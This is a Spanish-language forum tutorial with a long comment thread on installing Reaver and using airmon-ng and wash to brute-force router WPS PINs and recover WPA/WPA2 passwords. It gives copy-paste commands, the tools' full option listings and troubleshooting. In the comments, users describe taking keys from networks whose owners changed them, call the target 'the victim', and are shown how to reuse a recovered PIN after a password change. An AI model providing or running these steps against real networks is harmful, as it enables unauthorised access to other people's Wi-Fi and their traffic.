Sei sulla pagina 1di 10

Reaver Tutorial [wpa/wpa2]

*Reaver lo podes descargar aqui http://code.google.com/p/reaver-wps/downloads/list


O escribir en la terminal
wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz


Luego Descomprimimos
tar -xvf reaver-1.4.tar.gz

Entramos en la carpeta
cd reaver-1.4/src

Despues lo instalamos con
./configure
make
make install

Y listo ya lo tenemos instalado
Ahora a comprobar las redes vulnerables
* Ponemos nuestra targeta en modo monitor
airmon-ng start wlan0

Reaver Tutorial [wpa/wpa2]
*Para buscar las redes vulnerables escribimos
wash -i mon0

Reaver Tutorial [wpa/wpa2]
sintaxis de wash:
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files

Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode
[15]
-D, --daemonize Daemonize wash
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-h, --help Show help

Example:
wash -i mon0


*Anotamos los datos del wifi como el Access Point(B4:5D:3F:XX:XX:XX y canal
y luego ejecutamos reaver
Ejemplo:
Uso: reaver -i mon0 -b 00:1D:CE:6F:XX:XX -vv

Sintaxis de Reaver
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP

Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-o, --out-file=<file> Send output to a log file [stdout]
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-D, --daemonize Daemonize reaver
-a, --auto Auto detect the best advanced options for the target AP
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv for more)
-q, --quiet Only display critical messages
-h, --help Show help

Advanced Options:
-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
-d, --delay=<seconds> Set the delay between pin attempts [1]
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period [5]
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
-A, --no-associate Do not associate with the AP (association must be done by another
application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-n, --nack Target AP always sends a NACK [Auto]
-w, --win7 Mimic a Windows 7 registrar [False]

Example:
reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv

En mi caso me he tardado desde tres horas en sacar la clave wpa hasta 98 horas
Aqui les dejo algunos screenshoots :

Reaver Tutorial [wpa/wpa2]
Reaver Tutorial [wpa/wpa2]
0
Enviar 4
Me gusta Seguir A favoritos5
Calificacin
8
Seguidores
92.385
Visitas
42
Favoritos
30 comentarios

@MATONRAH hace 2 aos
se ve interesante, mas alrato lo calare y te comento como me fue carnal, muchas gracias por el
tuto!

@bt4777 hace 2 aos
esta bien pero ami me sale warning failded associated me podrias ayudar por favor :S

@briansx_404 hace 2 aos
Pero intentaste con wash -i mon0 ? aparecia el nombre de la red, puede que estes lejos del
router o prueba agregando el canal

reaver -i mon0 -b 11:22:33:44:55:66 -c canal -vv

Saludos !

@bt4777 hace 2 aos
briansx_404 dijo:Pero intentaste con wash -i mon0 ? aparecia el nombre de la red, puede que
estes lejos del router o prueba agregando el canal

reaver -i mon0 -b 11:22:33:44:55:66 -c canal -vv

Saludos !


claro lo eh intentado en mon0 ya que wlan0 no podia entrar desde el principio desde
airodump-ng y tube que probrar mon0

una duda mas esto es efectivo si la clave de defecto no esta cambiada?? un saludo!

@briansx_404 hace 2 aos
No importa la clave este por defecto, ni que le pongan( ya sean numero,alfanumerica), igual la
saca aqui tengo imagenes de el pass de un wifi que le han cambiado tres veces la clave que era
wpa2



Reaver Tutorial [wpa/wpa2]


Reaver Tutorial [wpa/wpa2]



Reaver Tutorial [wpa/wpa2]

@bt4777 hace 2 aos
a gracias entonces hoy mismo lo probare me ire de viaje y lo dejare en reaver q ver que pasa
hahaha!

gracias por tu ayuda espero que mas adelante me ayuudes soy nuevo en esto jeje! un saludo!

@Pelillos93 hace 2 aos
Lo intent probar una vez, pero no se cuantos paquetes haba que capturar para que el reaver
pudiese sacar la contrasea.

Saludos.

@briansx_404 hace 2 aos
no captura paquetes, intenta con un pin de 8 digitos y va avanzando por porciento % por
ejemplo cuando ya tiene los primeros 4 digitos se salta a 90,91% osea que ya le falta poco por
encontrar el pin de ahi saca el pass, una vez que tienes el pin y el dueo cambia la clave
puedes usar el pin asi por ejemplo

reaver -i mon0 -b 00:11:22:33:44:55 -p 12345670 -vv
donde 12345670 el pin que hayas sacado una vez y eso es todo el funcionamiento

@poyoregio hace 2 aos
hola ya tengo el pin de un router d-link eso quiere decir que me evito hacer muchos pasos o
hay que hacer todo desde el principio?, tambien tenia la clave wpa pero la cambiaron, con el
pin que tengo puedo sacar la clave sin esperar tanto tiempo? y lo podria hacer desde wifiway
3.4 que ya trae reaver instalado?

@briansx_404 hace 2 aos
es reaver -i mon0 -b 11:22:33:44:55 -p pinaqui -vv
y que no se te olvide tener la targeta en modo monitor airmon-ng start wlan0 o wlan1 etc

@MATONRAH hace 1 ao
ni habia regresado a comentar jaja, funciona al 100 carnal, ya te deje R+1, muchas gracias

@bt4777 hace 1 ao
Hola bueno ami me funciono en un router WLAN_XXXX tengo otros por 69% 4% 6% 0.1% no
los hago la verdad por que me da flojera pero funcionan

una pregunta mira hace tiempo tenia la clave de una red wifi WLAN_XXXX y la saque con un
generador de claves de defecto y me fije que tenia el WPS activo entonces la cuestion seria
como saber el pin del router por pongo la IP en el navegador y no puedo ver mas jjjej gracias y
saludos a esta comu +10

@natilucha hace 1 ao
copado!! probando: GRACIAS!!

@natilucha hace 1 ao
problema: el backtrack 5 r2 desde live cd ya viene con el reaver 1.4, pero cuando lo ejecuto va
brbaro, pero luego comienza a tenr problemas de asociacion,
Associated with XX:XX:XX:XX:XX:XX
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX
(...)
sera que el router se bloquea de mandar pines incorrectos?

@veguitah hace 1 ao
hola en donde puedo descargar el reaver para instalarlo porfa ayuda...

@benjanp hace 1 ao
Aqui esta la GUI para el reaver
http://www.taringa.net/posts/linux/16097627/Reaver-Saver.html

@arnir hace 1 ao
Orale lo probare habia intentando el de John de Ripper pero no me funciono usando BT5, la
verdad no se que tanta diferencia hay entre este y el John cual recomiendas (por supuesto
para una WPA2)?

@arnir hace 1 ao
por cierto si es por fuerza bruta este metodo verdad? es que mi vecino me dijo en buen plan
que si sacaba su contrasea me la podia quedar me amenazo con que tiene 25 caracteres y
palabras en aleman cuanto me tardare?

@briansx_404 hace 1 ao +1
1.- Es fuerza bruta pero no se necesita handshake, es una vulnerabildad por wps, primero
tienes que comprobar si el router es vulnerable(no todos tienen wps habilitado)

2.- Se demora de 3horas - 1dia En este caso, usando reaver no importa cuantas letras,numeros
tenga lo que busca es un codigo de 8 digitos que tienen los routers, mira Reaver Tutorial
[wpa/wpa2] http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf

3.- Si eres amigo de el puedes:

@Vidaure hace 1 ao
pero como puedo saber si el router a auditar tiene el wps activado ?

@briansx_404 hace 1 ao +1
Con el comando

wash -i mon0
si te aparece el nombre de la red como aqui Reaver Tutorial [wpa/wpa2]

Es porque es vulnerable a wps
Saludos.

@bt4777 hace 1 ao
aalguien podria hacer un tuto para instalar WPS-crackgui 1.2.4 por fas con gambas incluido

@briansx_404 hace 1 ao
sudo apt-get install gambas3 y sudo dpkg -i wpscrackgui

@pabheredia hace 11 meses
tengo una duda... como se usan todos esos comandos que aparecen ahi? ya descarge el reaver
desde la pagina que pusiste pero ahora no se que hacer, disculpa la ignorancia

@briansx_404 hace 11 meses
Esta explicado paso a paso, solo tienes que copiar y pegar los comandos.
Existe otro S.O llamado xiaopan OS bajalo y http://www.youtube.com/watch?v=WOqz6sKB5KY

@pabheredia hace 11 meses
@briansx_404 ah ok gracias...

@JhonValdivia hace 10 meses
hola men, por q cuando estoy usado el reaver, me sale el pin cambindose a cada rato de la
victima es normal o es defensa del router?

@JhonValdivia hace 10 meses
cuando aparece el wps locked (SI) no se puede atacar a ese router? o normal se puede? o
especficamente tiene q mostrar wps locked (NO) para poder sacar su clave

@briansx_404 hace 10 meses
No se esta cambiando, solo que reaver esta intentando buscar el pin correcto y te va indicando
el pin que esta enviando al router.
Cuando aparece [wps locked no] ahi si se puede intentar atacar.
slds

@chemiscal hace 7 meses
No me aparece cd reaver-1.4/src

@briansx_404 hace 7 meses +1
Escribe "ls" y ve que aparece, sino abre el explorador de archivos, descomprimes el archivo,
entras a la carpeta, reaverxx , luego en la terminal escribes "cd " sin las comillas y con un
espacio al final y luego arrastras la carpeta src que esta dentro de reaverxx y listo, aprietas
enter .
Saludos.

@Tano_cs hace 7 meses
no entiendo como instalarlo

@Ieoshafat hace 3 meses
Estimados....saque una clave wpa2, luego la cambiaron junto con su essid, pero ahora hace
poco intente denuevo sacar la pass, pero solo llego al 3.75%, me fije cambio hasta el canal lo
salve y al otro dia al seguir no reconocia el canal alguien me podria ayudar...gracias.

@raek_17_09 hace 2 meses
Cuanto tiempo tarda en sacar la clave? yo estuve 3 horas y seguia en 1,80%

@voggio hace 2 meses
Buen aporte bro, tengo una duda we, como lo instalo? tengo BackTrack5 en una maquina
virtual??? AYUDA!!!!
Tienes que ser miembro para responder en este tema

Potrebbero piacerti anche